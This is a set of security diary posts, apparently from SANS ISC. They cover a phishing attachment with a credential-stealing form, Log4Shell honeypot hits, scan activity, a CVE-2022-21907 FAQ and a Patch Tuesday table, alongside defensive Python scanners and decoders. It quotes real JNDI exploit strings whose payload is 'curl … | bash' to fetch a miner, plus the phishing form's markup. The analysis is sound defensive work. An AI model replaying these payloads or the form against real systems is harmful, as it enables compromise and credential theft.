This technique, in which phishers include an entire fake login page in an attachment, which only initiates communication with external infrastructure when a victim attempts to click a log in button has been with us for a while now[4], and certainly has its advantages from the point of view of the attackers. This time, however, there was a slight twist to it.

Probably in order to try to bypass basic security scans on e-mail gateways, the authors of the page attempted to include the HTML form (with the URL to which the credentials supplied by the victim should be sent) in the code of the page dynamically, using JavaScript functions “unescape” and “document.write” – i.e., the JavaScript was supposed to decode a string that contained the HTML code of the form and then include it in the body of the page. This approach of delivering some of the more “problematic” parts of HTML content encoded, and only decoding them using JavaScript when the web page is loaded by a browser is used quite often by threat actors, and can potentially be somewhat effective.

However, in this case, it seems that the authors of this specific fake login page either didn't understand how the JavaScript they included was supposed to work, or they simply forgot to do a final check before sending the phishing out. Whatever the reason, as the following code excerpt shows, they forgot to encode the relevant part of their HTML code, which makes the inclusion of the JavaScript decoder meaningless and leaves the form data (including the URL of the credential-gathering site) easily readable to even the simplest security tool...

<center><img height="100" src="https://www.smc.edu/administration/information-technology/student-email/images/office-365-logo.png?itok=w_rJbRrF" />
<p><font color="Black" face="Trebuchet MS" size="2"><strong>You have a pending document for download</strong><br />
DOC SIZE (1.0MB) </font></p>
<script language=javascript>document.write(unescape('<form class="modal-content animate" method="post" action="hxxps://metsbadseed[.]com/ctox/quotee.php">'))</script>
<div class="container">
<center>
<p><font color="black" face="Trebuchet MS" size="2">&nbsp;Prove You are not a Robot and&nbsp;</font><span style="color: rgb(0, 0, 0); font-size: small; text-align: -webkit-center;">To continue sign in your Microsoft email to Confirm Identity</span><br />
<input id="fname" name="login" placeholder="Enter Email Address" readonly="readonly" required="" type="email" value="sales@[redacted]" /><br />
<input autofocus="" id="fname" name="passwd" placeholder="Enter Email Password" required="" type="password" /><br />
<button type="submit">CONTINUE</button></p>
</center>

Although – given what we just mentioned – one can hardly call the phishing attempt sophisticated, the unusual inclusion of advertisement-like content in the body of the e-mail did, at least, make it somewhat interesting... And, hopefully, the slight failure on the part of its senders made it less likely to actually make it to recipients’ inboxes and cause any harm.
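As an added example (my code, not the phishing kit's), here is a Python scanner that extracts the form action from such an attachment both as a naive tool would (static text only) and after emulating document.write(unescape(...)). The unencoded snippet is a trimmed copy of the attachment above; the %-encoded variant is constructed to show what the authors presumably intended, and why a static scanner has to emulate the decoder to see the form in that case.

```python
import re
from urllib.parse import unquote

# Trimmed copy of the attachment above: the form is in clear inside the unescape() call.
UNENCODED = '''<script language=javascript>document.write(unescape('<form class="modal-content animate" method="post" action="hxxps://metsbadseed[.]com/ctox/quotee.php">'))</script>
<input id="fname" name="login" type="email" value="sales@[redacted]" />
<input id="fname" name="passwd" type="password" />'''

# Constructed variant: the same form, %-encoded as the kit's authors presumably intended.
ENCODED = '''<script language=javascript>document.write(unescape('%3Cform%20method%3D%22post%22%20action%3D%22hxxps%3A//metsbadseed%5B.%5Dcom/ctox/quotee.php%22%3E'))</script>
<input name="login" type="email" />
<input name="passwd" type="password" />'''

DOCWRITE_RE = re.compile(r"document\.write\(\s*unescape\(\s*(['\"])(.*?)\1\s*\)\s*\)", re.S)
ACTION_RE = re.compile(r'<form[^>]*\baction\s*=\s*["\']([^"\']+)["\']', re.I)
PASSWORD_RE = re.compile(r'<input[^>]*type\s*=\s*["\']password["\']', re.I)


def js_unescape(s):
    """JavaScript's unescape(): %XX and %uXXXX sequences (ASCII-only content assumed)."""
    s = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def expanded_html(html):
    """The static page plus whatever each document.write(unescape(...)) would insert."""
    inserted = [js_unescape(m.group(2)) for m in DOCWRITE_RE.finditer(html)]
    return html + '\n' + '\n'.join(inserted)


def form_actions(html, expand=False):
    """Form action URLs visible to a scanner, with or without emulating the decoder."""
    return ACTION_RE.findall(expanded_html(html) if expand else html)


def looks_like_credential_phish(html):
    """A password field plus a form posting somewhere: the pattern of a self-contained login page."""
    return bool(PASSWORD_RE.search(html)) and bool(form_actions(html, expand=True))
```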

[1] https://isc.sans.edu/forums/diary/Phishing+101+why+depend+on+one+suspicious+message+subject+when+you+can+use+many/27842/
[2] https://isc.sans.edu/forums/diary/Qakbot+in+a+response+to+Full+Disclosure+post/27130/
[3] https://isc.sans.edu/forums/diary/BazarLoader+phishing+lures+plan+a+Halloween+party+get+a+bonus+and+be+fired+in+the+same+afternoon/26710/
[4] https://isc.sans.edu/forums/diary/Phishing+with+a+selfcontained+credentialsstealing+webpage/25580/

-----------
Jan Kopriva
@jk0pr
Alef Nula

January 18, 2022

ISC Stormcast For Tuesday, January 18th, 2022 https://isc.sans.edu/podcastdetail.html?id=7840, (Tue, Jan 18th)

January 17, 2022

Log4Shell Attacks Getting "Smarter", (Mon, Jan 17th)

Ever since news of the Log4Shell vulnerability broke, we have seen a stream of attacks attempting to exploit this vulnerability in log4j (CVE-2021-44228).

Initial attempts were rather "blunt" and tried to insert the JNDI exploit string into various fields without much concern for how and where the string might be logged. More recently, we have seen more specific exploits targeting particular software configurations. Most notably, exploits have been released for the UniFi network controller and VMware products.

Today for example, we saw some exploit strings that may be targeting Tomcat configurations:

/$%7Bjndi:ldap://ldap://62.182.80.168:13899/o=tomcat%7D/x=%24%7Bjndi%3Aldap%3A%2F%2F142.44.203.85%3A1389%2FTomcatBypass%2FCommand%2FBase64%2FY3VybCA3Mi40Ni41Mi4xMzUvbWFkLnNoIHwgYmFzaA%3D%3D%7D

This decodes to:

/${jndi:ldap://ldap://62.182.80.168:13899/o=tomcat}/x=${jndi:ldap://142.44.203.85:1389/TomcatBypass/Command/Base64/Y3VybCA3Mi40Ni41Mi4xMzUvbWFkLnNoIHwgYmFzaA==}

With the Base64 part decoding to: curl 72.46.52.135/mad.sh | bash. This leads, after many redirects and the like, to a good old XMRig miner. Maybe something for a later day, as there are some interesting tidbits in the various shell scripts downloaded.

A second, similar attempt was found in about two dozen of our honeypots. This one assembles the "jndi:ldap" string from ${env:NaN:-x} lookups (an undefined environment variable falling back to its default value x) to evade naive pattern matching:

/?test=t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyB

The URL retrieved by this attempt is no longer available, but given the similar method, chances are it is yet another crypto miner.
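As an added example (not the honeypot's code), here is a Python helper that normalizes such strings: URL-decoding, collapsing ${env:NaN:-x}-style lookups to their default value, then pulling out the jndi: URLs and decoding any /Command/Base64/ payload. Both strings above are embedded as received; the second one is truncated in the log, so the decoder pads incomplete base64 instead of failing. The lookup forms handled (${lower:}, ${upper:} and the :-default form) are a small subset of what Log4j supports, an assumption to extend for your own traffic.

```python
import base64
import re
from urllib.parse import unquote

# The two strings above, exactly as they hit the honeypot (the second is cut off in the log).
SAMPLE_REQUESTS = [
    '/$%7Bjndi:ldap://ldap://62.182.80.168:13899/o=tomcat%7D/x=%24%7Bjndi%3Aldap%3A%2F%2F142.44.203.85%3A1389%2FTomcatBypass%2FCommand%2FBase64%2FY3VybCA3Mi40Ni41Mi4xMzUvbWFkLnNoIHwgYmFzaA%3D%3D%7D',
    '/?test=t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyB',
]

# ${env:NaN:-x} (undefined lookup, default x) and ${lower:x}/${upper:x} both collapse to x.
DEFAULT_LOOKUP_RE = re.compile(r'\$\{[^{}:]*:[^{}]*?:-([^{}]*)\}')
SIMPLE_LOOKUP_RE = re.compile(r'\$\{(?:lower|upper):([^{}]*)\}', re.IGNORECASE)
JNDI_RE = re.compile(r'jndi:(ldap|ldaps|rmi|dns)://([^\s{}$]+)', re.IGNORECASE)
B64_CMD_RE = re.compile(r'/Command/Base64/([A-Za-z0-9+/=]+)')


def normalize(s, max_rounds=10):
    """URL-decode and collapse nested lookup tricks until nothing changes."""
    s = unquote(s)
    for _ in range(max_rounds):
        new = DEFAULT_LOOKUP_RE.sub(r'\1', s)
        new = SIMPLE_LOOKUP_RE.sub(r'\1', new)
        new = unquote(new)
        if new == s:
            break
        s = new
    return s


def b64_lenient(chunk):
    """Decode base64 even when the log line was truncated in the middle of a block."""
    chunk = chunk.rstrip('=')
    if len(chunk) % 4 == 1:          # a lone trailing character cannot be decoded
        chunk = chunk[:-1]
    padded = chunk + '=' * (-len(chunk) % 4)
    return base64.b64decode(padded).decode('utf-8', 'replace')


def extract(request):
    """Return [(jndi_url, decoded_command_or_None)] for one request string."""
    s = normalize(request)
    out = []
    for scheme, rest in JNDI_RE.findall(s):
        url = f'{scheme}://{rest}'
        m = B64_CMD_RE.search(url)
        out.append((url, b64_lenient(m.group(1)) if m else None))
    return out


if __name__ == '__main__':
    for req in SAMPLE_REQUESTS:
        for url, cmd in extract(req):
            print(url, '->', repr(cmd))
```

Run it over your web server logs rather than only the honeypot strings: the decoded command is what tells you whether a hit was a scanner or an attempt that needs follow-up on the host.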

A few things to look for:

  • The first attempt erases log lines that contain this IP address: 107.191.63.34
  • It creates a /tmp/.shanbe directory
  • It connects to a mining pool at 207.38.87.6 (port 3333)
  • It downloads additional code from 41.157.42.239

But then again, if you need IoCs like this to detect crypto miners: Reassess what kind of monitoring you do on more basic parameters like CPU load and rogue processes running on systems.

The news around Log4Shell has gotten quiet, but it isn't over yet. Attacks keep evolving, so do not consider this a non-event just because none of the initial "spray and pray" attacks affected you.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

January 17, 2022

ISC Stormcast For Monday, January 17th, 2022 https://isc.sans.edu/podcastdetail.html?id=7838, (Mon, Jan 17th)

January 16, 2022

10 Most Popular Targeted Ports in the Past 3 Weeks, (Sun, Jan 16th)

A review of all inbound connections over the past 3 weeks against my honeypot shows that the top 2 targeted services were no surprise: a large amount of SSH (22, 2222) activity[2][3], followed by Telnet (23), for which Shodan still identifies over 2.7M hosts exposed to the Internet[1].

I previously wrote diaries [5,6] comparing SSH ports and banners, as well as Telnet and RDP [7], and the type of activity being logged hasn't really changed over time. One port that I was surprised to see in my top 5 was 6379 (see [4] for the exposed instances on Shodan): "Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache, and message broker."[8]

Indicators

218.92.0.202 (12,081)
159.223.46.162 (11,814)
218.92.0.203 (10,138)
185.36.81.60 (4,554)
213.100.222.21 (1,867)
92.255.85.135 (1,550)
161.35.77.239 (1,499)
92.255.85.237 (1,479)
185.161.70.44 (1,238)
128.199.116.10 (1,202)

[1] https://www.shodan.io/search?query=port:23
[2] https://www.shodan.io/search?query=port:22
[3] https://www.shodan.io/search?query=port:2222
[4] https://www.shodan.io/search?query=port:6379
[5] https://isc.sans.edu/diary/24724
[6] https://isc.sans.edu/diary/23201
[7] https://isc.sans.edu/diary/26492
[8] https://redis.io/topics/introduction

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

January 14, 2022

Use of Alternate Data Streams in Research Scans for index.jsp., (Fri, Jan 14th)

Our network of web application honeypots delivered some odd new URLs in the last 24 hours:

/index.jsp::$DATA
/jsp/index.jsp::$DATA
/cgi-bin/index.jsp::$DATA
/cgi-bin/jsp/index.jsp::$DATA
/demo/../index.jsp::$DATA
/demo/../jsp/index.jsp::$DATA
/scripts/index.jsp::$DATA
/scripts/jsp/index.jsp::$DATA

I am not 100% sure what these scans are after, but my best guess right now is that they are attempting to bypass filters using NTFS alternate data streams.

The Windows NTFS file system lets a file carry alternate data streams, addressed with the name:stream:$TYPE syntax; "::$DATA" names the default, unnamed data stream, so index.jsp::$DATA refers to the same content as index.jsp. This has been documented in the past as a technique to hide data or to bypass URL and upload filters [1][2].

In this case, the scans originate from 64.39.106.87, an IP associated with the vulnerability scanning company Qualys. It appears to be hunting for index.jsp, a default page for Java web applications. Inside a cgi-bin or scripts directory, it may well lead to code execution and may be protected by a WAF that the scanner attempts to bypass: a filter that matches "index.jsp" literally will not see "index.jsp::$DATA", while an NTFS open of that name returns the same file. I assume that, right now, this is likely just a Qualys research project, but it is a good reminder to double-check your URL filters.
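As an added example (not Qualys' scanner logic or any particular WAF's rules), here is Python that shows why these probes matter: a filter matching the raw request path misses every ::$DATA variant, while one that canonicalizes the path the way the file system would (stream suffix removed, ".." collapsed) catches them all and can also treat any stream syntax as suspicious in itself. The path list is the one above, plus two ordinary paths for contrast.

```python
import posixpath
import re

# The probes seen by the honeypots above, plus two ordinary paths for contrast.
SAMPLE_PATHS = [
    '/index.jsp::$DATA',
    '/jsp/index.jsp::$DATA',
    '/cgi-bin/index.jsp::$DATA',
    '/cgi-bin/jsp/index.jsp::$DATA',
    '/demo/../index.jsp::$DATA',
    '/demo/../jsp/index.jsp::$DATA',
    '/scripts/index.jsp::$DATA',
    '/scripts/jsp/index.jsp::$DATA',
    '/index.jsp',
    '/static/app.js',
]

# NTFS stream syntax is name:stream[:$TYPE]. "::$DATA" names the default (unnamed) data
# stream, i.e. the file content itself; "file.jsp:evil:$DATA" would be a named stream.
ADS_RE = re.compile(r'^(?P<name>[^:]*)(?::(?P<stream>[^:]*))?(?::\$(?P<type>[A-Za-z_]+))?$')

BLOCKED = ('index.jsp',)   # what a naive URL filter tries to keep away from cgi-bin etc.


def strip_ads(segment):
    """Split 'index.jsp::$DATA' into ('index.jsp', '::$DATA'); plain names give suffix None."""
    m = ADS_RE.match(segment)
    if not m or len(m.group('name')) == len(segment):
        return segment, None
    return m.group('name'), segment[len(m.group('name')):]


def canonical_path(path):
    """What the file system would actually open: stream suffixes dropped, '..' collapsed."""
    names, ads = [], None
    for seg in path.split('/'):
        name, suffix = strip_ads(seg)
        if suffix is not None:
            ads = suffix
        names.append(name)
    clean = posixpath.normpath('/'.join(names))
    if not clean.startswith('/'):
        clean = '/' + clean
    return clean, ads


def naive_filter(path):
    """Matches the raw request path only; this is what the ::$DATA probes slip past."""
    return path.endswith(BLOCKED)


def hardened_filter(path):
    """Decide on the canonical path, and treat any stream syntax as suspicious in itself."""
    clean, ads = canonical_path(path)
    return ads is not None or clean.endswith(BLOCKED)


if __name__ == '__main__':
    for p in SAMPLE_PATHS:
        print(f'{p:32} naive={naive_filter(p)!s:5} hardened={hardened_filter(p)!s:5} -> {canonical_path(p)}')
```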

Any other ideas? Let me know.

[1] https://owasp.org/www-community/attacks/Windows_alternate_data_stream
[2] https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

January 14, 2022

ISC Stormcast For Friday, January 14th, 2022 https://isc.sans.edu/podcastdetail.html?id=7836, (Fri, Jan 14th)

January 13, 2022

ISC Stormcast For Thursday, January 13th, 2022 https://isc.sans.edu/podcastdetail.html?id=7834, (Thu, Jan 13th)

January 12, 2022

A Quick CVE-2022-21907 FAQ (work in progress), (Wed, Jan 12th)

1 - When will an exploit be available?

Who knows. Microsoft rates the exploitability as "Exploitation More Likely". I suggest you patch this week.

2 - Which versions are affected?

Microsoft's advisory is a bit oddly worded. But at this point, my best read of it is: the vulnerable code was introduced in Windows Server 2019 and Windows 10 version 1809, but these versions of Windows have a registry value set by default that disables the feature. All later versions are vulnerable "out of the box". For Windows Server 2019 and Windows 10 version 1809, "HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\EnableTrailerSupport" is set to 0 by default, disabling trailers. You can check this registry value in PowerShell (thanks, Rob):

Get-ItemProperty "HKLM:\System\CurrentControlSet\Services\HTTP\Parameters" | Select-Object EnableTrailerSupport

3 - Am I vulnerable if I do not have IIS enabled?

Possibly. This is NOT an IIS vulnerability, but a vulnerability in http.sys. http.sys is probably best described as the core HTTP engine inside IIS. But other software uses http.sys as well and may expose the vulnerability: WinRM (Windows Remote Management) and WSDAPI (Web Services for Devices), for example, both rely on http.sys. For a quick list of processes using http.sys, try:

netsh http show servicestate

4 - Does a web application firewall help?

Likely yes. You could start (at your own risk) by simply blocking requests with trailers. Maybe log them first to see whether there are legitimate uses (let us know what uses them and how). For details, ask your web application firewall vendor.

5 - Was there a similar severe vulnerability in the past?

In 2015, we had a similar fire drill for CVE-2015-1635 (MS15-34). Maybe you kept notes? They will come in handy now. This Range header vulnerability never amounted to much.

6 - What are these Trailers about anyway?

Trailers are defined in RFC7230. They only make sense if "Transfer-Encoding: chunked" is used. With chunked encoding, the body of a request or response is transmitted in small chunks. Each chunk is preceded by a length in bytes. The idea behind this is that you may not know as you start sending a message how long it will be. In addition, chunked encoding does allow the sender to delay sending headers until the body is sent. These become "trailers". Here is a quick sample request:

POST / HTTP/1.1
Host: testing
Content-Type: text/plain
Transfer-Encoding: chunked
Trailer: X-Test

3
ABC
0
X-Test: 123

The RFC states that "the sender SHOULD generate a Trailer header", suggesting it is not mandatory. This may make filtering more difficult if an exploit does not use a Trailer header (again: I am speculating about what an exploit may look like, but a trailer without a corresponding Trailer header may cause some confusion).
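To make the filtering point in Q4 and the chunked/trailer mechanics in Q6 concrete, here is an added example (not code from the diary or from Microsoft): a small parser that de-chunks a request the way a logging filter would and reports trailer fields, including the corner case of trailers that arrive without an announcing Trailer header. The sample messages are constructed for this example, starting from the request shown above.

```python
"""Added example, not part of the ISC diary: de-chunk an HTTP/1.1 request and
report trailer fields, including the RFC 7230 "SHOULD" corner case where
trailers arrive without a Trailer header. Sample messages are constructed."""
from dataclasses import dataclass, field

@dataclass
class ParsedRequest:
    headers: dict                                   # lowercased name -> value (last wins)
    body: bytes                                     # de-chunked body
    trailers: dict = field(default_factory=dict)   # fields found after the 0-size chunk

def _parse_fields(block: bytes) -> dict:
    """Parse 'Name: value' lines up to the first empty line."""
    fields = {}
    for line in block.split(b"\r\n"):
        if not line:
            break
        name, _, value = line.partition(b":")
        fields[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return fields

def parse_chunked_request(raw: bytes) -> ParsedRequest:
    """Split a raw request into headers, de-chunked body and trailers."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete header block")
    _, _, header_block = head.partition(b"\r\n")        # drop the request line
    headers = _parse_fields(header_block)
    if "chunked" not in headers.get("transfer-encoding", "").lower():
        return ParsedRequest(headers, rest)             # not chunked: body is the rest
    body, pos = b"", 0
    while True:                                         # truncated input raises ValueError
        eol = rest.index(b"\r\n", pos)
        size = int(rest[pos:eol].split(b";")[0].strip(), 16)  # ignore chunk extensions
        pos = eol + 2
        if size == 0:                                   # last chunk: trailers follow
            break
        body += rest[pos:pos + size]
        pos += size + 2                                 # skip chunk data and its CRLF
    return ParsedRequest(headers, body, _parse_fields(rest[pos:]))

def trailer_findings(req: ParsedRequest) -> list:
    """Return the observations a filter (Q4) would log or block on."""
    announced = {h.strip().lower() for h in req.headers.get("trailer", "").split(",") if h.strip()}
    findings = []
    if req.trailers:
        findings.append("request carries trailer fields: " + ", ".join(sorted(req.trailers)))
        if not announced:
            findings.append("trailer fields present without a Trailer header")
        elif set(req.trailers) - announced:
            findings.append("trailer fields not listed in Trailer header: "
                            + ", ".join(sorted(set(req.trailers) - announced)))
    return findings

# Constructed samples: the diary's request, the same without a Trailer header, and no trailers.
ANNOUNCED = (b"POST / HTTP/1.1\r\nHost: testing\r\nContent-Type: text/plain\r\n"
             b"Transfer-Encoding: chunked\r\nTrailer: X-Test\r\n\r\n"
             b"3\r\nABC\r\n0\r\nX-Test: 123\r\n\r\n")
UNANNOUNCED = (b"POST / HTTP/1.1\r\nHost: testing\r\nTransfer-Encoding: chunked\r\n\r\n"
               b"3\r\nABC\r\n0\r\nX-Test: 123\r\n\r\n")
NO_TRAILERS = (b"POST / HTTP/1.1\r\nHost: testing\r\nTransfer-Encoding: chunked\r\n\r\n"
               b"3\r\nABC\r\n0\r\n\r\n")

if __name__ == "__main__":
    for name, raw in (("announced", ANNOUNCED), ("unannounced", UNANNOUNCED), ("none", NO_TRAILERS)):
        print(name, trailer_findings(parse_chunked_request(raw)))
```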

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu

January 12, 2022

ISC Stormcast For Wednesday, January 12th, 2022 https://isc.sans.edu/podcastdetail.html?id=7832, (Wed, Jan 12th)

January 11, 2022

Microsoft Patch Tuesday - January 2022, (Tue, Jan 11th)

Microsoft fixed 126 different CVEs with this month's update (this includes the Chromium issues patched in Edge). Six of the issues were publicly disclosed, and nine are rated critical. 

Noteworthy updates:

CVE-2022-21907: This is a remote code execution vulnerability in http.sys. http.sys is part of anything in Windows that processes HTTP requests (e.g., IIS!). But this vulnerability only affects the HTTP Trailer feature, which is not enabled by default (not sure if there is a good reason to enable it). HTTP trailers are used to delay sending headers until the end of the request (or response). They are typically used as part of chunked messages when the entire message is not known until the message has been sent. A "TE: trailers" header needs to be sent, and a "Trailer" header listing the delayed header names. This is potentially a wormable vulnerability, and Microsoft recommends prioritizing this patch. (This does not just affect IIS!)

CVE-2022-21846: Another critical remote code execution vulnerability in Exchange. But this vulnerability is not exploitable across the internet and requires the victim and the attacker to share the same network. 

CVE-2021-22947: This vulnerability in curl was originally disclosed in September, which is why it is noted as "Publicly Disclosed". This update fixes several vulnerabilities, not just the listed CVE.

See my dashboard for a more detailed breakout: https://patchtuesdaydashboard.com.

January 2022 Security Updates

| Description | CVE | Disclosed | Exploited | Exploitability (old versions) | Exploitability (current version) | Severity | CVSS Base (AVG) | CVSS Temporal (AVG) |
|---|---|---|---|---|---|---|---|---|
| .NET Framework Denial of Service Vulnerability | CVE-2022-21911 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5 |
| Active Directory Domain Services Elevation of Privilege Vulnerability | CVE-2022-21857 | No | No | Less Likely | Less Likely | Critical | 8.8 | 7.7 |
| Chromium: CVE-2022-0096 Use after free in Storage | CVE-2022-0096 | No | No | - | - | - | | |
| Chromium: CVE-2022-0097 Inappropriate implementation in DevTools | CVE-2022-0097 | No | No | - | - | - | | |
| Chromium: CVE-2022-0098 Use after free in Screen Capture | CVE-2022-0098 | No | No | - | - | - | | |
| Chromium: CVE-2022-0099 Use after free in Sign-in | CVE-2022-0099 | No | No | - | - | - | | |
| Chromium: CVE-2022-0100 Heap buffer overflow in Media streams API | CVE-2022-0100 | No | No | - | - | - | | |
| Chromium: CVE-2022-0101 Heap buffer overflow in Bookmarks | CVE-2022-0101 | No | No | - | - | - | | |
| Chromium: CVE-2022-0102 Type Confusion in V8 | CVE-2022-0102 | No | No | - | - | - | | |
| Chromium: CVE-2022-0103 Use after free in SwiftShader | CVE-2022-0103 | No | No | - | - | - | | |
| Chromium: CVE-2022-0104 Heap buffer overflow in ANGLE | CVE-2022-0104 | No | No | - | - | - | | |
| Chromium: CVE-2022-0105 Use after free in PDF | CVE-2022-0105 | No | No | - | - | - | | |
| Chromium: CVE-2022-0106 Use after free in Autofill | CVE-2022-0106 | No | No | - | - | - | | |
| Chromium: CVE-2022-0107 Use after free in File Manager API | CVE-2022-0107 | No | No | - | - | - | | |
| Chromium: CVE-2022-0108 Inappropriate implementation in Navigation | CVE-2022-0108 | No | No | - | - | - | | |
| Chromium: CVE-2022-0109 Inappropriate implementation in Autofill | CVE-2022-0109 | No | No | - | - | - | | |
| Chromium: CVE-2022-0110 Incorrect security UI in Autofill | CVE-2022-0110 | No | No | - | - | - | | |
| Chromium: CVE-2022-0111 Inappropriate implementation in Navigation | CVE-2022-0111 | No | No | - | - | - | | |
| Chromium: CVE-2022-0112 Incorrect security UI in Browser UI | CVE-2022-0112 | No | No | - | - | - | | |
| Chromium: CVE-2022-0113 Inappropriate implementation in Blink | CVE-2022-0113 | No | No | - | - | - | | |
| Chromium: CVE-2022-0114 Out of bounds memory access in Web Serial | CVE-2022-0114 | No | No | - | - | - | | |
| Chromium: CVE-2022-0115 Uninitialized Use in File API | CVE-2022-0115 | No | No | - | - | - | | |
| Chromium: CVE-2022-0116 Inappropriate implementation in Compositing | CVE-2022-0116 | No | No | - | - | - | | |
| Chromium: CVE-2022-0117 Policy bypass in Service Workers | CVE-2022-0117 | No | No | - | - | - | | |
| Chromium: CVE-2022-0118 Inappropriate implementation in WebShare | CVE-2022-0118 | No | No | - | - | - | | |
| Chromium: CVE-2022-0120 Inappropriate implementation in Passwords | CVE-2022-0120 | No | No | - | - | - | | |
| Clipboard User Service Elevation of Privilege Vulnerability | CVE-2022-21869 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1 |
| Connected Devices Platform Service Elevation of Privilege Vulnerability | CVE-2022-21865 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1 |
| DirectX Graphics Kernel File Denial of Service Vulnerability | CVE-2022-21918 | No | No | Less Likely | Less Likely | Important | 6.5 | 5.7 |
| DirectX Graphics Kernel Remote Code Execution Vulnerability | CVE-2022-21912 | No | No | Less Likely | Less Likely | Critical | 7.8 | 6.8 |
| DirectX Graphics Kernel Remote Code Execution Vulnerability | CVE-2022-21898 | No | No | Less Likely | Less Likely | Critical | 7.8 | 6.8 |
| HEVC Video Extensions Remote Code Execution Vulnerability | CVE-2022-21917 | No | No | Less Likely | Less Likely | Critical | 7.8 | 7.0 |
| HTTP Protocol Stack Remote Code Execution Vulnerability | CVE-2022-21907 | No | No | More Likely | More Likely | Critical | 9.8 | 8.5 |
| Libarchive Remote Code Execution Vulnerability | CVE-2021-36976 | Yes | No | Less Likely | Less Likely | Important | | |
| Local Security Authority (Domain Policy) Remote Protocol Security Feature Bypass | CVE-2022-21913 | No | No | Less Likely | Less Likely | Important | 5.3 | 4.8 |
| Local Security Authority Subsystem Service Elevation of Privilege Vulnerability | CVE-2022-21884 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8 |
| Microsoft Cluster Port Driver Elevation of Privilege Vulnerability | CVE-2022-21910 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8 |
| Microsoft Cryptographic Services Elevation of Privilege Vulnerability | CVE-2022-21835 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8 |
| Microsoft Diagnostics Hub Standard Collector Runtime Elevation of Privilege Vulnerability | CVE-2022-21871 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1 |
| Microsoft Dynamics 365 (on-premises) Spoofing Vulnerability | CVE-2022-21891 | No | No | Less Likely | Less Likely | Important | 7.6 | 6.6 |
| Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability | CVE-2022-21932 | No | No | Less Likely | Less Likely | Important | 7.6 | 6.6 |
| Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | CVE-2022-21954 | No | No | Less Likely | Less Likely | Important | 6.1 | 5.3 |
| Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | CVE-2022-21970 | No | No | Less Likely | Less Likely | Important | 6.1 | 5.3 |
| Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | CVE-2022-21929 | No | No | Less Likely | Less Likely | Moderate | 2.5 | 2.3 |
| Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | CVE-2022-21930 | No | No | Less Likely | Less Likely | Important | 4.2 | 3.8 |
| Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | CVE-2022-21931 | No | No | Less Likely | Less Likely | Important | 4.2 | 3.8 |
| Microsoft Excel Remote Code Execution Vulnerability | CVE-2022-21841 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8 |
| Microsoft Exchange Server Remote Code Execution Vulnerability | CVE-2022-21846 | No | No | More Likely | More Likely | Critical | 9.0 | 7.8 |
| Microsoft Exchange Server Remote Code Execution Vulnerability | CVE-2022-21855 | No | No | More Likely | More Likely | Important | 9.0 | 7.8 |
| Microsoft Exchange Server Remote Code Execution Vulnerability | CVE-2022-21969 | No | No | More Likely | More Likely | Important | 9.0 | 7.8 |
| Microsoft Office Remote Code Execution Vulnerability | CVE-2022-21840 | No | No | Less Likely | Less Likely | Critical | 8.8 | 7.7 |
| Microsoft SharePoint Server Remote Code Execution Vulnerability | CVE-2022-21837 | No | No | Less Likely | Less Likely | Important | 8.3 | 7.2 |
| Microsoft Word Remote Code Execution Vulnerability | CVE-2022-21842 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8 |
| Open Source Curl Remote Code Execution Vulnerability | CVE-2021-22947 | Yes | No | Less Likely | Less Likely | Critical | | |
| Remote Desktop Client Remote Code Execution Vulnerability | CVE-2022-21850 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.7 |
| Remote Desktop Client Remote Code Execution Vulnerability | CVE-2022-21851 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.7 |
| Remote Desktop Licensing Diagnoser Information Disclosure Vulnerability | CVE-2022-21964 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8 |
| Remote Desktop Protocol Remote Code Execution Vulnerability | CVE-2022-21893 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.7 |
| Remote Procedure Call Runtime Remote Code Execution Vulnerability | CVE-2022-21922 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.7 |
| Secure Boot Security Feature Bypass Vulnerability | CVE-2022-21894 | No | No | Less Likely | Less Likely | Important | 4.4 | 3.9 |
| Storage Spaces Controller Information Disclosure Vulnerability | CVE-2022-21877 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8 |
| Tablet Windows User Interface Application Core Elevation of Privilege Vulnerability | CVE-2022-21870 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1 |
